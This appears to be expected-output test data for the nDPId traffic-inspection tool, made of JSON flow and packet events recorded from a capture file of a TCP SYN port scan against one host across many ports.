+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsOXwAADEG3fasEAAIQA2GNIzTCd3dU4MZAAAAAGACCAAmrwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsNxwAADQG3VasEAAIQA2GNIzTGPXdU4MZAAAAAGACBAAblwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsJVkAACwG9xmsEAAIQA2GNIzTBGPdU4MZAAAAAGACBAAwKQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsDfUAACkGEX6sEAAIQA2GNIzTJcLdU4MZAAAAAGACCAAKygAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058656,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058656,"pkt":"ACYLMQczACWzv5HuCABFAAAsmA4AADEGf2SsEAAIQA2GNIzTn8\/dU4MZAAAAAGACCACQvAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058656,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058656,"pkt":"ACYLMQczACWzv5HuCABFAAAsR7UAACkG172sEAAIQA2GNIzTGrfdU4MZAAAAAGACCAAV1QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs4CAAACsGPVKsEAAIQA2GNIzTSp3dU4MZAAAAAGACEADd7gAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wMAADgGPW+sEAAIQA2GNIzTAyHdU4MZAAAAAGACBAAxawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsmC8AADgGeEOsEAAIQA2GNIzTD07dU4MZAAAAAGACBAAlPgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsWfUAADoGtH2sEAAIQA2GNIzT8n7dU4MZAAAAAGACDAA6DQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsO2YAACYG5wysEAAIQA2GNIzTC+zdU4MZAAAAAGACDAAgoAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsT1UAACkG0B2sEAAIQA2GNIzTBNzdU4MZAAAAAGACCAArsAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsowkAAC0GeGmsEAAIQA2GNIzTAprdU4MZAAAAAGACCAAt8gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsNmQAAC4G5A6sEAAIQA2GNIzTCU7dU4MZAAAAAGACDAAjPgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAslb0AACYGjLWsEAAIQA2GNIzTDSndU4MZAAAAAGACDAAfYwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs9egAADAGIoqsEAAIQA2GNIzTABrdU4MZAAAAAGACBAA0cgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsBpsAACcGGtisEAAIQA2GNIzTX3zdU4MZAAAAAGACEADJDwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsFHoAADIGAfmsEAAIQA2GNIzTDubdU4MZAAAAAGACDAAdpgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAshuMAADUGjI+sEAAIQA2GNIzTGivdU4MZAAAAAGACCAAWYQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsa28AACwGsQOsEAAIQA2GNIzTABHdU4MZAAAAAGACBAA0ewAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs1BIAADMGQWCsEAAIQA2GNIzTFF7dU4MZAAAAAGACEAAULgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsyOsAADQGS4esEAAIQA2GNIzSEyPdUoMYAAAAAGACBAAhbAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsMVIAACcG8CCsEAAIQA2GNIzSzoXdUoMYAAAAAGACEABaCQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsMDcAADAG6DusEAAIQA2GNIzSD6bdUoMYAAAAAGACBAAk6QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs8eUAADYGII2sEAAIQA2GNIzSDaXdUoMYAAAAAGACDAAe6gAAAgQFtA=="} 